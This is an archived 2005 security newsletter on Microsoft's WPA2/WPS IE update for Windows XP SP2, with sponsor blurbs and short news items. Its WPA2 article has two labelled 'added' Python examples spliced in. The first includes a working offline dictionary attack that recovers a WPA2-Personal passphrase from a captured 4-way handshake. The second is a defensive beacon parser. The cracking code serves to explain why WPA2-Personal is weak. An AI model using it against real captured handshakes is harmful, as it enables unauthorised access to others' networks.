[ISN] Security UPDATE -- WPA2 and WSP IE for Windows XP SP2 -- May 11, 2005

InfoSec News isn at c4i.org
Fri May 13 07:08:05 EDT 2005


This email newsletter comes to you free and is supported by the 
following advertisers, which offer products and services in which 
you might be interested. Please take a moment to visit these 
advertisers' Web sites and show your support for Security UPDATE. 

Managing and Securing IM in the Enterprise: Why It Should Be a Top Priority

Integrated Help Desk Services Lead to Greater IT Productivity


1. In Focus: WPA2 and WPS IE for Windows XP SP2

2. Security News and Features
   - Recent Security Vulnerabilities
   - SANS Reports Most Dangerous Vulnerabilities for Q1 2005
   - Sobering Worm Inundates Inboxes

3. Security Toolkit
   - Security Matters Blog
   - FAQ
   - Security Forum Featured Thread

4. New and Improved
   - Server Monitoring Service


==== Sponsor: Akonix Systems ====

Managing and Securing IM in the Enterprise: Why It Should Be a Top 
   With instant messaging virtually in all corporate environments, and 
expected to be as prevalent as email in the near future, it has rapidly 
become an indispensable business communication tool. Yet, IM growth 
within the enterprise brings an associated increase in security risks 
to both public and enterprise IM networks. In this free white paper, 
learn how you can take control of IM use on your network to ensure 
security and compliance. You'll learn how to protect yourself from 
Virus & worms attacks, Identity theft, Leakage of confidential 
information and more. Download now!


==== 1. In Focus: WPA2 and WPS IE for Windows XP SP2 ====
   by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

If you use wireless networking in your environment, you'll be 
interested to learn that Microsoft has released an update to improve 
wireless network security for users of Windows XP with Service Pack 2 
(SP2). The update enhances the XP wireless client software with support 
for Wi-Fi Protected Access 2 (WPA2), which according to the Wi-Fi 
Alliance "is based on the final IEEE 802.11i amendment to the 802.11 
standard and is eligible for FIPS 140-2 compliance." 

WPA2 offers much stronger security than Wired Equivalent Privacy 
(WEP) or Wi-Fi Protected Access (WPA). WEP has long been known to be 
vulnerable. I've read at least one account in which a WEP connection 
was cracked in only a few minutes. The successor to WEP, WPA, isn't as 
easy to crack as WEP, and the new WPA2 standard offers even better 
security. The Wi-Fi Alliance said the primary difference between WPA 
and WPA2 is that WPA2 uses the Advanced Encryption Standard (AES) to 
encrypt network traffic (in the CCMP mode defined by 802.11i), whereas 
WPA uses the Rivest Cipher 4 (RC4) stream cipher, wrapped in the 
Temporal Key Integrity Protocol (TKIP) as a stopgap that WEP-era 
hardware could still run.

WPA2 Personal authenticates with a preshared key (PSK) that every 
client derives from the same passphrase, and WPA2 Enterprise uses 
802.1X authentication with the Extensible Authentication Protocol 
(EAP), which gives each session its own master key. Like 
WPA, WPA2 facilitates roaming access between wireless Access Points 
(APs). Several manufacturers already make WPA2-certified APs and 
wireless NICs, and many provide WPA2 hardware and drivers that work 
with several versions of Windows. For example, Broadcom, Cisco Systems, 
Devicescape Software (formerly Instant802 Networks), Intel, and Realtek 
Semiconductor all make WPA2-enabled products that can be used on almost 
any Windows platform. Other vendors make products based on Atheros 
Communications chipsets, which are also WPA2-certified. 
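To make the Personal/Enterprise distinction concrete, here is an added 
example (not code from the newsletter or from Microsoft's update) that 
walks the WPA2-Personal key hierarchy in Python: the preshared key is 
derived from the passphrase and SSID, expanded into the pairwise 
transient key using the two MAC addresses and nonces from the 4-way 
handshake, and used to compute the handshake's MIC. The handshake it 
checks is constructed in the code (the SSID, addresses, nonces, 
EAPOL-Key frame and wordlist are assumptions); only the PMK for 
passphrase "password" and SSID "IEEE" is checked against the IEEE 
802.11i test vector. recover_passphrase shows the weakness of the 
Personal mode that the Enterprise mode avoids: anyone who captures one 
handshake can test passphrases offline with no rate limit.

```python
"""WPA/WPA2-Personal key hierarchy (IEEE 802.11i) and why a captured 4-way
handshake lets an attacker test passphrases offline.

Added example for this newsletter, not code from Microsoft's update. The
handshake below (SSID, MAC addresses, nonces, EAPOL-Key frame, wordlist) is
constructed here; the derivation steps are the standard's.
"""
import hashlib
import hmac
import struct


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (= PSK) = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the only salt, so precomputed tables per common SSID are practical."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, dklen=32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    KCK = PTK[0:16] signs handshake messages, KEK = PTK[16:32], TK = PTK[32:48] (CCMP key)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # EAPOL header (4) + descriptor fields preceding the 16-byte Key MIC


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key
    frame with the MIC field zeroed, truncated to 16 bytes. (WPA/TKIP uses HMAC-MD5.)"""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay: int = 1) -> bytes:
    """Minimal EAPOL-Key message 2 of the 4-way handshake (MIC zeroed, no key data)."""
    body = struct.pack(">BHHQ", 2, 0x010A, 16, replay)        # descriptor, key info, key len, replay
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # nonce, IV, RSC, ID
    body += b"\x00" * 16 + struct.pack(">H", 0)                # MIC placeholder, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body          # EAPOL version 1, type Key


def recover_passphrase(candidates, ssid, aa, spa, anonce, snonce, frame):
    """Offline check: the MIC inside the captured frame is the oracle and nothing
    rate-limits the attacker. Cost per guess is dominated by the 4096 PBKDF2 rounds."""
    mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for cand in candidates:
        kck = derive_ptk(derive_pmk(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), mic):
            return cand
    return None


# --- constructed handshake (assumed values, not a real capture) ---
SSID = "CorpWiFi"
AA = bytes.fromhex("020000000001")    # AP (authenticator) address
SPA = bytes.fromhex("020000000002")   # client (supplicant) address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
REAL_PASSPHRASE = "correct horse battery"


def captured_msg2() -> bytes:
    """Message 2 as a sniffer would see it: MIC computed with the real passphrase."""
    frame = build_msg2(SNONCE)
    kck = derive_ptk(derive_pmk(REAL_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def demo():
    """Run a small constructed wordlist against the constructed capture."""
    wordlist = ["password", "letmein", "CorpWiFi2005", REAL_PASSPHRASE, "hunter2"]
    return recover_passphrase(wordlist, SSID, AA, SPA, ANONCE, SNONCE, captured_msg2())


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: PMK("password", "IEEE")
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print("recovered passphrase:", demo())
```

Only the Python standard library (hashlib, hmac, struct) is needed. With 
WPA2 Enterprise the PMK comes out of the EAP exchange per session, so 
there is no shared passphrase to guess; with WPA2 Personal the only 
defenses are a long random passphrase and an uncommon SSID.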

Wireless Provisioning Services Information Element (WPS IE) support is 
also included in the update. Some wireless ISPs are moving from 
unsecured to secured networks by implementing 802.1X. During the 
transition, an ISP can configure its APs to broadcast one Service Set 
Identifier (SSID) for the unsecured network and another SSID for the 
secured network. Because of the way some APs advertise multiple SSIDs 
in their Beacon and Probe Response frames, the secured network's SSID 
isn't visible to clients that don't understand WPS IE. The update lets 
the XP wireless client recognize both types of AP SSIDs.
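The SSID and security capabilities a client sees come from the 
information elements (IEs) in Beacon and Probe Response frames, the 
same type-length-value list that WPS IE extends. The following added 
example (not from the newsletter or from Microsoft, and it does not 
decode the WPS IE itself, whose format the newsletter doesn't give) 
parses constructed Beacon frame bodies in Python, pulls out the SSID, 
the RSN IE that advertises WPA2 and the vendor-specific WPA IE, and 
classifies each network the way a WPA2-capable client would. It also 
rejects an IE whose length runs past the end of the frame, which is the 
check a client or driver must make before trusting anything in a 
beacon. The three sample frames are constructed for the example.

```python
"""Parse the information elements (IEs) of an 802.11 Beacon or Probe Response body
and classify the network (Open / WEP / WPA / WPA2, Personal / Enterprise).

Added example for this newsletter; not Microsoft's code and not the WPS IE format
(which the newsletter does not describe). Frame bodies are constructed by hand.
Element IDs and suite selectors are those of IEEE 802.11i (RSN IE) and the WPA IE.
"""
import struct

IE_SSID, IE_RSN, IE_VENDOR = 0, 48, 221
OUI_IEEE = bytes.fromhex("000fac")  # suite selectors inside the RSN (WPA2) IE
OUI_WFA = bytes.fromhex("0050f2")   # OUI of the vendor-specific WPA IE (type 1)
CIPHER = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKM = {1: "802.1X", 2: "PSK"}


def parse_ies(ies: bytes):
    """Yield (element_id, value) from a TLV run. A length byte that runs past the
    buffer is rejected rather than read; IE parsers in drivers have been a frequent
    source of overreads, so the length is never trusted."""
    i = 0
    while i < len(ies):
        if i + 2 > len(ies):
            raise ValueError("truncated IE header")
        eid, ln = ies[i], ies[i + 1]
        if i + 2 + ln > len(ies):
            raise ValueError(f"IE {eid}: length {ln} exceeds frame")
        yield eid, ies[i + 2:i + 2 + ln]
        i += 2 + ln


def parse_rsn_body(body: bytes, oui: bytes) -> dict:
    """Decode version, group cipher, pairwise ciphers and AKM suites. The RSN IE and
    the WPA IE share this layout; only the OUI in the selectors differs."""
    def suite(pos, table):
        sel = body[pos:pos + 4]
        if len(sel) < 4:
            raise ValueError("truncated suite selector")
        return table.get(sel[3], sel.hex()) if sel[:3] == oui else "vendor:" + sel.hex()

    def suite_list(pos, table):
        (count,) = struct.unpack_from("<H", body, pos)
        pos += 2
        return [suite(pos + 4 * k, table) for k in range(count)], pos + 4 * count

    (version,) = struct.unpack_from("<H", body, 0)
    group = suite(2, CIPHER)
    pairwise, pos = suite_list(6, CIPHER)
    akm, _ = suite_list(pos, AKM)
    return {"version": version, "group": group, "pairwise": pairwise, "akm": akm}


def describe_beacon(body: bytes) -> dict:
    """Read the fixed fields (timestamp, interval, capability) and the IEs a client
    uses to decide what it is joining."""
    if len(body) < 12:
        raise ValueError("beacon body shorter than fixed fields")
    interval, cap = struct.unpack_from("<HH", body, 8)
    info = {"ssid": None, "hidden": False, "privacy": bool(cap & 0x0010),
            "beacon_interval_tu": interval, "wpa": None, "wpa2": None}
    for eid, val in parse_ies(body[12:]):
        if eid == IE_SSID:
            # APs that "hide" the SSID send an empty or all-NUL element in beacons
            info["hidden"] = len(val) == 0 or set(val) == {0}
            info["ssid"] = None if info["hidden"] else val.decode("utf-8", "replace")
        elif eid == IE_RSN:
            info["wpa2"] = parse_rsn_body(val, OUI_IEEE)
        elif eid == IE_VENDOR and val[:4] == OUI_WFA + b"\x01":
            info["wpa"] = parse_rsn_body(val[4:], OUI_WFA)
    return info


def classify(info: dict) -> str:
    """Prefer the strongest protection advertised, as a WPA2-capable client does."""
    for name in ("wpa2", "wpa"):
        suites = info[name]
        if suites:
            mode = "Enterprise" if "802.1X" in suites["akm"] else "Personal"
            return f"{name.upper()}-{mode}"
    return "WEP" if info["privacy"] else "Open"


def is_malformed(body: bytes) -> bool:
    """True when the frame cannot be parsed safely (bad IE length, short suite list)."""
    try:
        describe_beacon(body)
        return False
    except (ValueError, struct.error):
        return True


def ie(eid: int, value: bytes) -> bytes:
    return bytes([eid, len(value)]) + value


# Constructed sample frames: timestamp 0, 100 TU interval, ESS bit (+ privacy bit).
FIXED_PRIV = struct.pack("<QHH", 0, 100, 0x0011)
FIXED_OPEN = struct.pack("<QHH", 0, 100, 0x0001)
BEACON_WPA2_ENT = (FIXED_PRIV + ie(IE_SSID, b"CorpWiFi") + ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))
                   + ie(3, b"\x06")
                   + ie(IE_RSN, bytes.fromhex("0100 000fac04 0100 000fac04 0100 000fac01 0000")))
BEACON_WPA_PSK_HIDDEN = (FIXED_PRIV + ie(IE_SSID, b"")
                         + ie(IE_VENDOR, bytes.fromhex("0050f201 0100 0050f202 0100 0050f202 0100 0050f202")))
BEACON_OPEN_HOTSPOT = FIXED_OPEN + ie(IE_SSID, b"Hotspot-Open")

if __name__ == "__main__":
    for frame in (BEACON_WPA2_ENT, BEACON_WPA_PSK_HIDDEN, BEACON_OPEN_HOTSPOT):
        summary = describe_beacon(frame)
        print(classify(summary), summary)
```

A real client feeds the body of each received Beacon or Probe Response 
(everything after the 802.11 MAC header) to describe_beacon; the hidden 
SSID case is why scanners send Probe Requests for a known name, and the 
malformed case is why the length check comes before any decoding.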

You can learn more about the new update at the link above. You can also 
learn more about creating secure wireless hotspots in the MSDN Library 
article "Securing Public Wi-Fi Hotspots" at

Microsoft TechNet also has a new Cable Guy column, "Wi-Fi Protected 
Access 2 (WPA2) Overview." The column explains WPA2 in a fair amount of 
detail, including key caching, fast roaming, pre-authentication, and 

In addition, Microsoft maintains links to numerous other wireless-
related articles on its Windows Server 2003 Wi-Fi Web site. 

A new white paper, "Deploying Wi-Fi Protected Access (WPA) and WPA2 in 
the Enterprise," is available in PDF format at The Wi-Fi Alliance's Web 
site (first URL below). A 60-minute presentation, "Wi-Fi Protected 
Access: Locking Down the Link," by Michael Disabato of the Burton 
Group, reviews WEP, WPA, WPA2, implementation, and more and is also 
available at the Wi-Fi Alliance Web site (second URL below). 


In the Web chat "Reality Check: What to Expect with Windows Server 2003 
Service Pack 1," Michael Otey will answer your questions about Windows 
Firewall, Data Execution Prevention (DEP), boot-time protection, the 
Security Configuration Wizard (SCW), and much more. Thursday, May 12, 
12:00 noon Eastern (9:00 A.M. Pacific).


==== Sponsor: HP ====

Integrated Help Desk Services Lead to Greater IT Productivity
   As organizations focus on aligning IT infrastructures to support 
business needs, IT managers must have the processes and tools to ensure 
that the infrastructure keeps pace with business needs and provides 
guaranteed levels of service at predetermined costs. This free white 
paper explores how to meet IT infrastructure's needs and manage crucial 
support and service processes by implementing Help Desk, problem, 
change, configuration, and service-level agreement (SLA) management 
into a single workflow. Improve productivity and service delivery 
quality while reducing costs, resources, and downtime in your 
organization. Download now!


==== 2. Security News and Features ====

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at

SANS Reports Most Dangerous Vulnerabilities for Q1 2005
   SANS released a list of what it considers the most dangerous 
vulnerabilities discovered in first quarter 2005. Affected products 
include multiple Microsoft products; Computer Associates' License 
software; multiple Oracle servers; media players Nullsoft Winamp, Apple 
Computer's iTunes Music Store, and RealNetworks' RealPlayer (and 
Microsoft Windows Media Player); antivirus products from Symantec, 
Trend Micro, and McAfee; and DNS services in Symantec security products 
(and Windows OSs).

Sobering Worm Inundates Inboxes
   The latest incarnation of the Sober worm is inundating inboxes in 
some countries with an enticement to win tickets to the World Cup 
soccer tournament in Germany. The email message that carries the worm 
(known as Sober.N, Sober.O, Sober.P, Sober.S, or Sober.V, depending on 
which antivirus vendor database you check) could also have a different 
message subject and content. 


==== Resources and Events ====

Improve the Availability of Your Exchange Servers
   Managing storage growth, providing application resiliency, and 
handling small errors and problems before they grow are all important 
aspects of boosting your Exchange uptime. In this free Web seminar, 
discover how storage and application management techniques for Exchange 
can be used to improve the resiliency and performance of your Exchange 
infrastructure. Register now!

Updating Software on Windows Desktops and Servers: WSUS and Beyond
   In this free Web seminar, join industry expert Dan Holme as he 
explores options for implementing and managing WSUS and other automated 
solutions in your organization. You'll learn how WSUS makes it easy to 
keep Windows systems and Microsoft applications up-to-date with 
patches, security rollups, drivers, and updates. Plus, you'll discover 
alternatives to manage the deployment and patching of non-Microsoft 

Establish a Manageable Desktop Software Configuration and Control IT 
   Managing desktop software configurations is a manual process, 
resulting in unplanned costs, deployment delays, and client confusion. 
In this free Web seminar, find out how you can meet software-package-
preparation requirements and increase your desktop reliability, user 
satisfaction, and IT cost effectiveness. You'll learn about the new 
application process, issue management during package preparation, 
historical recording and reporting, and more.

Take the Hack IIS 6.0 challenge now!
   Follow along as industry guru Roger Grimes puts IIS 6.0 to the test. 
The first hacker to succeed will win an Xbox.

Get Ready for SQL Server 2005 Roadshow in a U.S. City Near You--and in 
   Get the facts about migrating to SQL Server 2005. SQL Server experts 
will present real-world information about administration, development, 
and business intelligence to help you implement a best-practices 
migration to SQL Server 2005 and improve your database computing 
environment. Attend and receive a 1-year membership to PASS and 1-year 
subscription to SQL Server Magazine. Register now!
   For a U.S. city

   For Europe


==== Featured White Paper ====

Phishing, Viruses, Bot-Nets and More: How to Prevent the "Perfect 
Storm" from Devastating Your Email System
   Unfortunately, fragmented appliance-based and software-based 
antispam solutions operating inside the email gateway can't prevent a 
potentially devastating impact on your email system and users. In this 
free white paper, learn how you can protect your email boundary and 
stop attacks with a multilayered approach that effectively prevents the 
perfect storm from ever reaching your email gateway. Download your copy 


==== Hot Release ====

Best Practices for Establishing and Enforcing a Security Policy in Your 
   With all the viruses, Trojans, spyware, malware, and malicious 
attacks out there, is your company as prepared as it can be to fend off 
these threats? This white paper will provide you with detailed 
information for establishing and enforcing a security policy so that 
you have a safety net to fall back on and can ensure that you're making 
the right decisions at a demanding time. Specifically, you'll go 
through the process of creating a security policy and creating an 
incident response plan to prepare your organization for the worst-case 
scenario. Download this free white paper now!


==== 3. Security Toolkit ==== 

Security Matters Blog: 20 Security Fixes for Mac OS X
   by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=990C:4FB69

   Got Mac? If you do, check Apple Computer's download site to see if 
you need to install the latest security update. The company released 
Security Update 2005-005 for Mac OS X 10.3.9 (client and server 
editions), which contains 20 security fixes.

FAQ
   by John Savill, http://list.windowsitpro.com/t?ctl=9909:4FB69 

Q: How can I create a Microsoft Office 2003 installation source that 
has an integrated service pack and hotfixes?

Find the answer at

Security Forum Featured Thread: Guest User Password Required
   A forum participant writes that he has a Windows 2000-based mixed-
mode domain. He wants to know if there's a way to use Group Policy to 
force a password to be required for the Guest user account at the 
domain level. If not, how can he set the local policies on each system 
without having to physically visit each computer? Join the discussion 


==== Announcements ====
   (from Windows IT Pro and its partners)

SQL Server Magazine Gives DBAs and Developers What They Need
   With SQL Server 2005 right around the corner, it's important to note 
that SQL Server Magazine is on target to deliver comprehensive coverage 
of all betas of the new product and the final release. If you aren't 
already a subscriber, now is the time to subscribe. Act now and save 
47% off the cover price, plus get the new Reporting Services poster.

Nominate Yourself or a Friend for the MCP Hall of Fame
   Are you a top-notch MCP who deserves to be a part of the first-ever 
MCP Hall of Fame? Get the fame you deserve by nominating yourself or a 
peer to become a part of this influential community of certified 
professionals. You could win a VIP trip to Microsoft and other valuable 
prizes. Enter now--it's easy:


==== 4. New and Improved ====
   by Renee Munshi, products at windowsitpro.com

Server Monitoring Service
   TAB Computer Systems today announced the availability of PatrolDog 
2.0, a monitoring and support service for small businesses' file 
servers. PatrolDog monitors (over the Internet) critical server items 
such as Windows event logs, daily backups, disk space usage, power 
issues, hardware failures, and virus and security issues. TAB is 
currently offering a trial of PatrolDog, in which it will gather and 
analyze your server information and then email you a server status 
report. Pricing is per month: $60 for the first server, $40 for the 
second server, and $20 for each additional server. For more 
information, go to

Tell Us About a Hot Product and Get a T-Shirt!
   Have you used a product that changed your IT experience by saving 
you time or easing your daily burden? Tell us about the product, and 
we'll send you a T-shirt if we write about the product in a future 
Windows IT Pro What's Hot column. Send your product suggestions with 
information about how the product has helped you to 
   whatshot at windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
   Share your security-related discoveries, comments, or problems and 
solutions in the Windows IT Security print newsletter's Reader to 
Reader column. Email your contributions (500 words or less) to 
r2rwinitsec at windowsitpro.com. If we print your submission, you'll 
get $100. We edit submissions for style, grammar, and length.


==== Sponsored Links ====

Converting a Microsoft Access Application to Oracle HTML DB
   Convert MS Access into a Web application for multiple users. 
Download now!


==== Contact Us ==== 

About the newsletter -- letters at windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=990E:4FB69
About product news -- products at windowsitpro.com
About your subscription -- windowsitproupdate at windowsitpro.com
About sponsoring Security UPDATE -- emedia_opps at windowsitpro.com


This email newsletter is brought to you by Windows IT Security, 
the leading publication for IT professionals securing the Windows 
enterprise from external intruders and controlling access for 
internal users. Subscribe today.

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.

More information about the ISN mailing list